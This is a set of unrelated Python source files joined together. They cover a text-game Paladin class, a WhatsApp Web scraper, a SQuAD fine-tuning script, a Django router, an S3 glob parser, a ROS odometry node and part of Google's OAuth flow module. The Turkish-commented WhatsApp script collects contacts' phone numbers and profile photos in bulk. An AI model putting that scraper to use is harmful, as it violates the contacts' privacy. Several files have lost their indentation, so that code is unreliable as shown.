import random
from damage import Damage
from decorators import cast_spell
from entities import Character, Monster, CHARACTER_DEFAULT_EQUIPMENT
from heal import HolyHeal
from models.spells.loader import load_paladin_spells_for_level
from spells import PaladinSpell
class Paladin(Character):
"""
Paladin spells:
Spells every paladin starts with:
Seal of Righteousness
Deals X damage on each attack, needs to be activated first
"""
# TODO: Storing the spells here will be a problem if we ever want to have 2 simultaneous players or
# the ability to load another character without exiting the game.
learned_spells: {str: PaladinSpell} = {}
SOR_ACTIVE = False # Seal of Righteousness trigger
SOR_TURNS = 0 # Holds the remaining turns for SOR
KEY_FLASH_OF_LIGHT = "Flash of Light"
KEY_SEAL_OF_RIGHTEOUSNESS = "Seal of Righteousness"
KEY_MELTING_STRIKE = "Melting Strike"
def __init__(self, name: str, level: int = 1, health: int = 12, mana: int = 15, strength: int = 4,
loaded_scripts: set=set(), killed_monsters: set=set(), completed_quests: set=(),
saved_inventory: dict={"gold": 0}, saved_equipment: dict=CHARACTER_DEFAULT_EQUIPMENT):
super().__init__(name=name, level=level, health=health, mana=mana, strength=strength, loaded_scripts=loaded_scripts,
killed_monsters=killed_monsters, completed_quests=completed_quests,
saved_inventory=saved_inventory, saved_equipment=saved_equipment)
# TODO: Equip items AFTER level up
self.min_damage = 1
self.max_damage = 3
self._lookup_and_handle_new_spells()
def end_turn_update(self):
super().end_turn_update()
        if self.SOR_ACTIVE and self.SOR_TURNS == 0:  # fade the seal once its turns run out
self.SOR_ACTIVE = False
print(f'{self.KEY_SEAL_OF_RIGHTEOUSNESS} has faded from {self.name}')
def leave_combat(self):
super().leave_combat()
self.SOR_ACTIVE = False # Remove SOR aura
self.reset_spell_cooldowns()
def reset_spell_cooldowns(self):
"""
Resets the cooldown of every spell
Typically called when we leave combat
"""
for spell in self.learned_spells.values():
spell.reset_cd()
def _level_up(self, to_level: int=0, to_print: bool=True):
"""
This method levels the character up, if we're given a to_level we need to level up until we get to that level
"""
if to_level:
super()._level_up(to_level=to_level, to_print=to_print)
else:
super()._level_up(to_print=to_print)
self._lookup_and_handle_new_spells()
def _lookup_and_handle_new_spells(self):
"""
This method looks up all the new available spells to learn or update their ranks and does so
accordingly
"""
for available_spell in self._lookup_available_spells_to_learn(
self.level): # generator that returns dictionaries holding spell attributes
# update spell rank
if available_spell.name in self.learned_spells:
self.update_spell(available_spell)
# learn new spell
else:
self.learn_new_spell(spell=available_spell)
def learn_new_spell(self, spell: PaladinSpell):
print(f"You have learned a new spell - {spell.name}")
self.learned_spells[spell.name] = spell
def _lookup_available_spells_to_learn(self, level: int) -> [PaladinSpell]:
"""
Generator function yielding from a list of PaladinSpells that the character can learn
"""
yield from load_paladin_spells_for_level(level)
def update_spell(self, spell: PaladinSpell):
spell_name = spell.name
self.learned_spells[spell_name] = spell
print(f'Spell {spell.name} has been updated to rank {spell.rank}!')
print("*" * 20)
def spell_handler(self, command: str, target: Monster) -> bool:
"""
:param target: The target the spell is cast on
:param command: Command telling you which spell to use
:return: Returns a boolean indicating if the cast was successful or not
"""
if command == 'sor':
return self.spell_seal_of_righteousness(self.learned_spells[self.KEY_SEAL_OF_RIGHTEOUSNESS])
elif command == 'fol':
return self.spell_flash_of_light(self.learned_spells[self.KEY_FLASH_OF_LIGHT])
elif command == 'ms':
return self.spell_melting_strike(spell=self.learned_spells[self.KEY_MELTING_STRIKE], target=target)
print("Unsuccessful cast")
return False # if we do not go into any spell
@cast_spell
def spell_seal_of_righteousness(self, spell: PaladinSpell):
"""
When activated adds DAMAGE1 Spell Damage to each attack
Lasts for three turns
:return: boolean indicating if the cast was successful or not
"""
mana_cost = spell.mana_cost
self.mana -= mana_cost
self.SOR_ACTIVE = True
self.SOR_TURNS = 3
print(f'{self.name} activates {self.KEY_SEAL_OF_RIGHTEOUSNESS}!')
return True
def _spell_seal_of_righteousness_attack(self):
self.SOR_TURNS -= 1
return self.learned_spells[self.KEY_SEAL_OF_RIGHTEOUSNESS].damage1 # damage from SOR
@cast_spell
def spell_flash_of_light(self, spell):
"""
Heals the paladin for a certain amount
:return successful cast or not
"""
mana_cost = spell.mana_cost
heal = HolyHeal(heal_amount=spell.heal1)
self.health += heal
self.mana -= mana_cost
if self.health > self.max_health: # check for overheal
overheal = self._handle_overheal()
print(f'{spell.name} healed {self.name} for {heal-overheal:.2f} ({overheal:.2f} Overheal).')
else:
print(f'{spell.name} healed {self.name} for {heal}.')
return True
@cast_spell
def spell_melting_strike(self, spell: PaladinSpell, target: Monster):
""" Damages the enemy for DAMAGE_1 damage and puts a DoT effect, the index of which is EFFECT
:return successful cast or not"""
mana_cost: int = spell.mana_cost
damage: Damage = Damage(phys_dmg=spell.damage1)
dot: 'DoT' = spell.harmful_effect
dot.update_caster_level(self.level)
self.mana -= mana_cost
# damage the target and add the DoT
print(f'{spell.name} damages {target.name} for {damage}!')
target.take_attack(damage, self.level)
target.add_buff(dot)
return True
# SPELLS
def get_auto_attack_damage(self, target_level: int) -> (Damage, int):
level_difference = self.level - target_level
percentage_mod = (abs(level_difference) * 0.1) # calculates by how many % we're going to increase/decrease dmg
sor_damage = 0
damage_to_deal = random.randint(int(self.min_damage), int(self.max_damage))
if self.SOR_ACTIVE:
sor_damage = self._spell_seal_of_righteousness_attack()
# 10% more or less damage for each level that differs
if level_difference < 0: # monster is bigger level
damage_to_deal -= damage_to_deal * percentage_mod # -X%
sor_damage -= sor_damage * percentage_mod
elif level_difference > 0: # character is bigger level
damage_to_deal += damage_to_deal * percentage_mod # +X%
sor_damage += sor_damage * percentage_mod
return Damage(phys_dmg=damage_to_deal, magic_dmg=sor_damage), sor_damage
def attack(self, victim: Monster):
attacker_swing: (Damage, int) = self.get_auto_attack_damage(victim.level)
auto_attack: Damage = attacker_swing[0] # type: Damage
# the sor_damage below is used just to check for printing
sor_damage: int = attacker_swing[1] # if the seal isn't active the damage will be 0
auto_attack_print = victim.get_take_attack_damage_repr(auto_attack, self.level)
if sor_damage:
print(f'{self.name} attacks {victim.name} for {auto_attack_print} from {self.KEY_SEAL_OF_RIGHTEOUSNESS}!')
else:
print(f'{self.name} attacks {victim.name} for {auto_attack_print}!')
victim.take_attack(auto_attack, self.level)
def get_class(self):
"""
Return the class name in lowercase.
Ex: paladin
"""
return self.__class__.__name__.lower()
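# A rough combat sketch (illustrative; `some_monster` stands in for a Monster
# instance from the entities module and is an assumption here):
#
#   paladin = Paladin(name="Uther")
#   paladin.spell_handler("sor", target=some_monster)  # activate Seal of Righteousness
#   paladin.attack(some_monster)                       # auto attack + seal damage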
|
the-stack_106_14874
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import TimeoutException
import base64
import time
import os
from datetime import datetime
from pathlib import Path
# Enter the full path to the Chrome driver.
# If you want, you can download the latest version here: https://chromedriver.chromium.org/
driverLocation = Path(__file__).parent / "chromedrivers/linux/chromedriver"
class Scraper:
def __init__(self):
chrome_options = Options()
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("user-data-dir=~/Library/Application Support/Google/Chrome/Default/Cookies")
self.driver = webdriver.Chrome(driverLocation)
print("Whattsapp ekranı açılıyor ")
self.driver.get('https://web.whatsapp.com')
print("QR kodu okutup giriş yaptıktan sonra \"Yeni sohbet\" tuşuna basıp Enter' a basın ")
input()
def scrapeImages(self, name):
try:
contact_name = name
try:
contact = self.driver.find_element_by_xpath("//span[@title=\"" + contact_name + "\"]")
except:
print("İsim listede yok gibi arama kutusu deneniyor")
search_box_xpath = '//div[@class="_1awRl copyable-text selectable-text"][@contenteditable="true"][@data-tab="3"]'
search_box = WebDriverWait(self.driver, 50).until(
lambda driver: self.driver.find_element_by_xpath(search_box_xpath))
search_box.click()
search_box.send_keys(contact_name)
time.sleep(2)
contact = self.driver.find_element_by_xpath("//span[@title=\"" + contact_name + "\"]")
contact.click()
print("Kişi Bulundu")
menu = self.driver.find_element_by_xpath("(//div[@title=\"Diğer seçenekler\"])[2]")
menu.click()
time.sleep(2)
try:
info = self.driver.find_element_by_xpath("//div[@title=\"Kişi bilgisi\"]")
except:
info = self.driver.find_element_by_xpath("//div[@title=\"Grup bilgisi\"]")
info.click()
time.sleep(1)
numara = self.driver.find_element_by_xpath('//*[@id="app"]/div/div/div[2]/div[3]/span/div/span/div/div/div[1]/div[4]/div[3]/div/div/span/span').text
print ("Kişi Numarası: "+numara)
print("==================Resim Kaydı Deneniyor====================")
while True:
try:
image_xpath = '//img[@class="_3t3gU rlUm6 _1VzZY"]'
image = WebDriverWait(self.driver, 20).until(
lambda driver: self.driver.find_element_by_xpath(image_xpath))
image_src = image.get_attribute("src")
image_name = image_src.rsplit('/', 1)[
1]
result = self.driver.execute_async_script("""
var uri = arguments[0];
var callback = arguments[1];
var toBase64 = function(buffer){for(var r,n=new Uint8Array(buffer),t=n.length,a=new Uint8Array(4*Math.ceil(t/3)),i=new Uint8Array(64),o=0,c=0;64>c;++c)i[c]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charCodeAt(c);for(c=0;t-t%3>c;c+=3,o+=4)r=n[c]<<16|n[c+1]<<8|n[c+2],a[o]=i[r>>18],a[o+1]=i[r>>12&63],a[o+2]=i[r>>6&63],a[o+3]=i[63&r];return t%3===1?(r=n[t-1],a[o]=i[r>>2],a[o+1]=i[r<<4&63],a[o+2]=61,a[o+3]=61):t%3===2&&(r=(n[t-2]<<8)+n[t-1],a[o]=i[r>>10],a[o+1]=i[r>>4&63],a[o+2]=i[r<<2&63],a[o+3]=61),new TextDecoder("ascii").decode(a)};
var xhr = new XMLHttpRequest();
xhr.responseType = 'arraybuffer';
xhr.onload = function(){ callback(toBase64(xhr.response)) };
xhr.onerror = function(){ callback(xhr.status) };
xhr.open('GET', uri);
xhr.send();
""", image_src)
if type(result) == int:
raise Exception("İstek Reddedildi %s" % result)
final_image = base64.b64decode(result)
filename = 'images/' +numara.strip("+").strip()+ '.jpg' # I assume you have a way of picking unique filenames
with open(filename, 'wb') as f:
f.write(final_image)
print("Kaydediliyor " + filename + "")
close_image_button = self.driver.find_element_by_xpath('//div[@title="Yeni sohbet"]')
close_image_button.click()
except Exception as e:
try:
close_image_button = self.driver.find_element_by_xpath('//div[@title="Yeni sohbet"]')
close_image_button.click()
except Exception as err:
print("")
break
except Exception as e:
print(e)
self.driver.quit()
def quitDriver(self):
print("Quit")
self.driver.quit()
os.system('clear')
print ("""
TR Whatsapp profil potoğrafı kaydedici
) ( (
( /( ( ) )\ ) )\ )
)\()) )\ ) ( (()/( (()/(
((_)\ (()/( )\ '/(_)) ((_))
| |(_) )(_)) _((_))(_) _| _| |
| '_ \| || || ' \()| _|/ _` |
|_.__/ \_, ||_|_|_| |_| \__,_|
|__/
""")
scraper = Scraper()
isimler = ["Aa", "Yusuf"]
for i in isimler:
print("===================Yeni Kişi Deneniyor=================")
scraper.scrapeImages(i)
|
the-stack_106_14876
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for question-answering."""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
from transformers import AutoConfig, AutoModelForQuestionAnswering, AutoTokenizer, HfArgumentParser, SquadDataset
from transformers import SquadDataTrainingArguments as DataTrainingArguments
from transformers import Trainer, TrainingArguments
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
use_fast: bool = field(default=False, metadata={"help": "Set this flag to use fast tokenization."})
# If you want to tweak more attributes on your tokenizer, you should do it in a distinct script,
# or just modify its tokenizer_config.json.
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Prepare Question-Answering task
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
model = AutoModelForQuestionAnswering.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
# Get datasets
is_language_sensitive = hasattr(model.config, "lang2id")
train_dataset = (
SquadDataset(
data_args, tokenizer=tokenizer, is_language_sensitive=is_language_sensitive, cache_dir=model_args.cache_dir
)
if training_args.do_train
else None
)
eval_dataset = (
SquadDataset(
data_args,
tokenizer=tokenizer,
mode="dev",
is_language_sensitive=is_language_sensitive,
cache_dir=model_args.cache_dir,
)
if training_args.do_eval
else None
)
# Initialize our Trainer
trainer = Trainer(model=model, args=training_args, train_dataset=train_dataset, eval_dataset=eval_dataset,)
# Training
if training_args.do_train:
trainer.train(
model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
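# A hedged example invocation (assumptions: the script is saved as run_squad_trainer.py and the
# flag names come from the argument dataclasses above; the model name and paths are illustrative):
#   python run_squad_trainer.py \
#       --model_name_or_path bert-base-uncased \
#       --data_dir ./squad --output_dir ./squad_out \
#       --do_train --do_eval --overwrite_output_dir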
|
the-stack_106_14878
|
from django.http import HttpResponseNotFound
from .logging import logger
from .registry import registry
def router(request, name: str, *args, **kwargs):
try:
view = registry[name]
except KeyError:
logger.debug('Resolving "%s"...' % name)
return HttpResponseNotFound()
else:
return view(request, *args, **kwargs)
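# A minimal URLconf sketch showing one way to wire this router up; the import path and URL
# prefix below are assumptions for illustration only:
#   from django.urls import path
#   from myapp.views import router
#   urlpatterns = [path("r/<str:name>/", router, name="named-router")]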
|
the-stack_106_14879
|
from types import SimpleNamespace
from fnmatch import fnmatch
from itertools import takewhile
def s3_file_info(f, bucket):
url = "s3://{}/{}".format(bucket, f.get("Key"))
return SimpleNamespace(
url=url,
size=f.get("Size"),
last_modified=f.get("LastModified"),
etag=f.get("ETag"),
)
def norm_predicate(pred=None, glob=None):
def glob_predicate(glob, pred):
if pred is None:
return lambda f: fnmatch(f.url, glob)
else:
return lambda f: fnmatch(f.url, glob) and pred(f)
if glob is not None:
return glob_predicate(glob, pred)
return pred
def parse_query(url_query):
"""
- s3://bucket/some/path/
- s3://bucket/some/path/something
- s3://bucket/some/path/*/*/
- s3://bucket/some/path/*/*/file.yaml
- s3://bucket/some/path/*/*/*.yaml
- s3://bucket/some/path/**/file.yaml
"""
glob_set = set("*[]?")
def is_glob(s):
return bool(glob_set.intersection(set(s)))
pp = url_query.split("/")
base = list(takewhile(lambda s: not is_glob(s), pp))
qq = pp[len(base) :]
glob, _file, depth = None, None, None
if len(qq) > 0:
last = qq.pop()
if is_glob(last):
glob = last
elif last != "":
_file = last
qq_set = set(qq)
if len(qq) == 0:
depth = 0
elif qq_set == {"**"}:
depth = -1
elif "**" not in qq_set:
depth = len(qq)
else:
raise ValueError("Bad query: %s" % url_query)
base = "/".join(base)
base = base.rstrip("/") + "/"
return SimpleNamespace(base=base, depth=depth, file=_file, glob=glob)
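# A minimal sketch of the parsed result for one of the documented query forms
# (values derived by tracing the functions above; the bucket and path are illustrative):
#   q = parse_query("s3://bucket/some/path/*/*/*.yaml")
#   # q.base == "s3://bucket/some/path/", q.depth == 2, q.file is None, q.glob == "*.yaml"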
|
the-stack_106_14881
|
from __future__ import print_function
import threading
import rospy
from roboclaw_driver.msg import Stats
from b2_logic.odometry_helpers import yaw_from_odom_message
from b2_logic.base_functions import (
calc_create_speed_cmd,
calc_base_frame_velocity_from_encoder_diffs,
calc_odometry_from_base_velocity
)
class BaseNode:
def __init__(self, wheel_dist, wheel_radius, ticks_per_rotation,
max_drive_secs, deadman_secs, max_qpps, max_accel,
base_frame_id, world_frame_id,
speed_cmd_pub, odom_pub, tf_broadcaster):
self._wheel_dist = wheel_dist
self._wheel_radius = wheel_radius
self._ticks_per_rotation = ticks_per_rotation
self._max_drive_secs = max_drive_secs
self._deadman_secs = deadman_secs
self._max_qpps = max_qpps
self._max_accel = max_accel
self._base_frame_id = base_frame_id
self._world_frame_id = world_frame_id
self._speed_cmd_pub = speed_cmd_pub
self._odom_pub = odom_pub
self._tf_broadcaster = tf_broadcaster
# Init Twist command state
self._x_linear_cmd = 0.0
self._z_angular_cmd = 0.0
# Last time we received a Twist message from the Pilot
# If we don't get a message after deadman_secs, we stop the base
self._last_cmd_vel_time = None # type: rospy.Time
# Init Odometry state
self._world_x = 0.0
self._world_y = 0.0
self._world_theta = 0.0
self._last_odom_time = None # type: rospy.Time
# Init Roboclaw stats state
self._roboclaw_front_stats = None # type: Stats
self._roboclaw_rear_stats = None # type: Stats
# Roboclaw encoder state
self._m1_front_enc_prev = 0
self._m2_front_enc_prev = 0
self._m1_rear_enc_prev = 0
self._m2_rear_enc_prev = 0
self._stats_lock = threading.RLock() # To serialize access to the qpps stats
self._cmd_vel_lock = threading.RLock() # To serialize access to x/z command variables
def run(self, loop_hz):
"""Runs the main loop of the node.
Sends motor commands, and publishes odometry.
"""
rospy.logdebug("Running node")
looprate = rospy.Rate(loop_hz)
# Set initial states
if self._roboclaw_front_stats is not None:
self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val
self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val
if self._roboclaw_rear_stats is not None:
self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val
self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val
self._last_odom_time = rospy.get_rostime()
try:
while not rospy.is_shutdown():
self.process_base_loop()
looprate.sleep()
except rospy.ROSInterruptException:
rospy.logwarn("ROSInterruptException received in main loop")
def cmd_vel_callback(self, msg):
"""Called by the Twist cmd_vel message subscriber.
Parameters:
:param Twist msg: Twist command velocity message
"""
with self._cmd_vel_lock:
self._x_linear_cmd = msg.linear.x
self._z_angular_cmd = msg.angular.z
self._last_cmd_vel_time = rospy.get_rostime()
rospy.logdebug("CMD Vel - X: {} | Z: {}".format(msg.linear.x, msg.angular.z))
def roboclaw_stats_callback(self, stats, callback_args):
"""Called by the Roboclaw Stats message subscriber
Parameters:
:param Stats stats: Roboclaw Stats message
:param list callback_args: Arguments to this function (i.e. "front" or "rear")
"""
with self._stats_lock:
if "front" in callback_args:
self._roboclaw_front_stats = stats
elif "rear" in callback_args:
self._roboclaw_rear_stats = stats
else:
rospy.logwarn("roboclaw_stats_callback: Unsure which stats to read")
rospy.logwarn("callback_args: {}".format(callback_args))
def process_base_loop(self):
# If the last command was received more than deadman_secs ago, stop the base
if (
self._last_cmd_vel_time is None or
(rospy.get_rostime() - self._last_cmd_vel_time).to_sec() > self._deadman_secs
):
self._x_linear_cmd = 0.0
self._z_angular_cmd = 0.0
# ---------------------------------
# Calculate and send motor commands
# ---------------------------------
with self._cmd_vel_lock:
x_linear_cmd = self._x_linear_cmd
z_angular_cmd = self._z_angular_cmd
cmd = calc_create_speed_cmd(
x_linear_cmd, z_angular_cmd,
self._wheel_dist, self._wheel_radius,
self._ticks_per_rotation, self._max_drive_secs, self._max_qpps, self._max_accel
)
self._speed_cmd_pub.publish(cmd)
# -------------------------------
# Calculate and publish Odometry
# -------------------------------
if self._roboclaw_front_stats is None or self._roboclaw_rear_stats is None:
rospy.loginfo("Insufficient roboclaw stats received, skipping odometry calculation")
return
with self._stats_lock:
# Calculate change in encoder readings
m1_front_enc_diff = self._roboclaw_front_stats.m1_enc_val - self._m1_front_enc_prev
m2_front_enc_diff = self._roboclaw_front_stats.m2_enc_val - self._m2_front_enc_prev
m1_rear_enc_diff = self._roboclaw_rear_stats.m1_enc_val - self._m1_rear_enc_prev
m2_rear_enc_diff = self._roboclaw_rear_stats.m2_enc_val - self._m2_rear_enc_prev
self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val
self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val
self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val
self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val
# Since this is a two-Roboclaw robot, take the average of the encoder diffs
# from each Roboclaw for each side.
m1_enc_diff = (m1_front_enc_diff + m1_rear_enc_diff) / 2
m2_enc_diff = (m2_front_enc_diff + m2_rear_enc_diff) / 2
# We take the nowtime from the Stats message so it matches the encoder values.
# Otherwise we would get timing variances based on when the loop runs compared to
# when the stats were measured.
# Since this is a two-Roboclaw robot, take the latest stats timestamp from either
# Roboclaw.
front_stamp = self._roboclaw_front_stats.header.stamp
rear_stamp = self._roboclaw_rear_stats.header.stamp
nowtime = max(front_stamp, rear_stamp)
x_linear_v, y_linear_v, z_angular_v = calc_base_frame_velocity_from_encoder_diffs(
m1_enc_diff, m2_enc_diff,
self._ticks_per_rotation, self._wheel_radius, self._wheel_dist,
self._last_odom_time, nowtime
)
time_delta_secs = (nowtime - self._last_odom_time).to_sec()
self._last_odom_time = nowtime
odom = calc_odometry_from_base_velocity(
x_linear_v, y_linear_v, z_angular_v,
self._world_x, self._world_y, self._world_theta,
time_delta_secs, nowtime,
self._base_frame_id, self._world_frame_id
)
self._odom_pub.publish(odom)
# -----------------------------------------
# Calculate and broadcast tf transformation
# -----------------------------------------
self._world_x = odom.pose.pose.position.x
self._world_y = odom.pose.pose.position.y
self._world_theta = yaw_from_odom_message(odom)
quat = odom.pose.pose.orientation
self._tf_broadcaster.sendTransform(
(self._world_x, self._world_y, 0),
(quat.x, quat.y, quat.z, quat.w),
nowtime,
self._base_frame_id,
self._world_frame_id
)
self._last_odom_time = nowtime
rospy.logdebug(
"World position: [{}, {}] heading: {}".format(
self._world_x, self._world_y, self._world_theta))
rospy.logdebug(
"Forward speed: {}, Turn speed: {}".format(
self._x_linear_cmd, self._z_angular_cmd))
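# A minimal wiring sketch for this node; every parameter value, publisher object and frame id
# below is an illustrative assumption, not a value taken from the original package:
#   node = BaseNode(wheel_dist=0.22, wheel_radius=0.032, ticks_per_rotation=4480,
#                   max_drive_secs=1.0, deadman_secs=1.0, max_qpps=3700, max_accel=20000,
#                   base_frame_id="base_link", world_frame_id="odom",
#                   speed_cmd_pub=speed_cmd_pub, odom_pub=odom_pub, tf_broadcaster=tf_broadcaster)
#   node.run(loop_hz=10)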
|
the-stack_106_14882
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 Authorization Flow
This module provides integration with `requests-oauthlib`_ for running the
`OAuth 2.0 Authorization Flow`_ and acquiring user credentials.
Here's an example of using :class:`Flow` with the installed application
authorization flow::
from google_auth_oauthlib.flow import Flow
# Create the flow using the client secrets file from the Google API
# Console.
flow = Flow.from_client_secrets_file(
'path/to/client_secrets.json',
scopes=['profile', 'email'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob')
# Tell the user to go to the authorization URL.
auth_url, _ = flow.authorization_url(prompt='consent')
print('Please go to this URL: {}'.format(auth_url))
# The user will get an authorization code. This code is used to get the
# access token.
code = input('Enter the authorization code: ')
flow.fetch_token(code=code)
# You can use flow.credentials, or you can just get a requests session
# using flow.authorized_session.
session = flow.authorized_session()
print(session.get('https://www.googleapis.com/userinfo/v2/me').json())
This particular flow can be handled entirely by using
:class:`InstalledAppFlow`.
.. _requests-oauthlib: http://requests-oauthlib.readthedocs.io/en/stable/
.. _OAuth 2.0 Authorization Flow:
https://tools.ietf.org/html/rfc6749#section-1.2
"""
from base64 import urlsafe_b64encode
import hashlib
import json
import logging
try:
from secrets import SystemRandom
except ImportError: # pragma: NO COVER
from random import SystemRandom
from string import ascii_letters, digits
import webbrowser
import wsgiref.simple_server
import wsgiref.util
import google.auth.transport.requests
import google.oauth2.credentials
import google_auth_oauthlib.helpers
_LOGGER = logging.getLogger(__name__)
class Flow(object):
"""OAuth 2.0 Authorization Flow
This class uses a :class:`requests_oauthlib.OAuth2Session` instance at
:attr:`oauth2session` to perform all of the OAuth 2.0 logic. This class
just provides convenience methods and sane defaults for doing Google's
particular flavors of OAuth 2.0.
Typically you'll construct an instance of this flow using
:meth:`from_client_secrets_file` and a `client secrets file`_ obtained
from the `Google API Console`_.
.. _client secrets file:
https://developers.google.com/identity/protocols/oauth2/web-server
#creatingcred
.. _Google API Console:
https://console.developers.google.com/apis/credentials
"""
def __init__(
self,
oauth2session,
client_type,
client_config,
redirect_uri=None,
code_verifier=None,
autogenerate_code_verifier=False,
):
"""
Args:
oauth2session (requests_oauthlib.OAuth2Session):
The OAuth 2.0 session from ``requests-oauthlib``.
client_type (str): The client type, either ``web`` or
``installed``.
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
redirect_uri (str): The OAuth 2.0 redirect URI if known at flow
creation time. Otherwise, it will need to be set using
:attr:`redirect_uri`.
code_verifier (str): random string of 43-128 chars used to verify
the key exchange, using PKCE.
autogenerate_code_verifier (bool): If true, auto-generate a
code_verifier.
.. _client secrets:
https://github.com/googleapis/google-api-python-client/blob
/main/docs/client-secrets.md
"""
self.client_type = client_type
"""str: The client type, either ``'web'`` or ``'installed'``"""
self.client_config = client_config[client_type]
"""Mapping[str, Any]: The OAuth 2.0 client configuration."""
self.oauth2session = oauth2session
"""requests_oauthlib.OAuth2Session: The OAuth 2.0 session."""
self.redirect_uri = redirect_uri
self.code_verifier = code_verifier
self.autogenerate_code_verifier = autogenerate_code_verifier
@classmethod
def from_client_config(cls, client_config, scopes, **kwargs):
"""Creates a :class:`requests_oauthlib.OAuth2Session` from client
configuration loaded from a Google-format client secrets file.
Args:
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
Raises:
ValueError: If the client configuration is not in the correct
format.
.. _client secrets:
https://github.com/googleapis/google-api-python-client/blob/main/docs/client-secrets.md
"""
if "web" in client_config:
client_type = "web"
elif "installed" in client_config:
client_type = "installed"
else:
raise ValueError("Client secrets must be for a web or installed app.")
# these args cannot be passed to requests_oauthlib.OAuth2Session
code_verifier = kwargs.pop("code_verifier", None)
autogenerate_code_verifier = kwargs.pop("autogenerate_code_verifier", None)
(
session,
client_config,
) = google_auth_oauthlib.helpers.session_from_client_config(
client_config, scopes, **kwargs
)
redirect_uri = kwargs.get("redirect_uri", None)
return cls(
session,
client_type,
client_config,
redirect_uri,
code_verifier,
autogenerate_code_verifier,
)
@classmethod
def from_client_secrets_file(cls, client_secrets_file, scopes, **kwargs):
"""Creates a :class:`Flow` instance from a Google client secrets file.
Args:
client_secrets_file (str): The path to the client secrets .json
file.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
"""
with open(client_secrets_file, "r") as json_file:
client_config = json.load(json_file)
return cls.from_client_config(client_config, scopes=scopes, **kwargs)
@property
def redirect_uri(self):
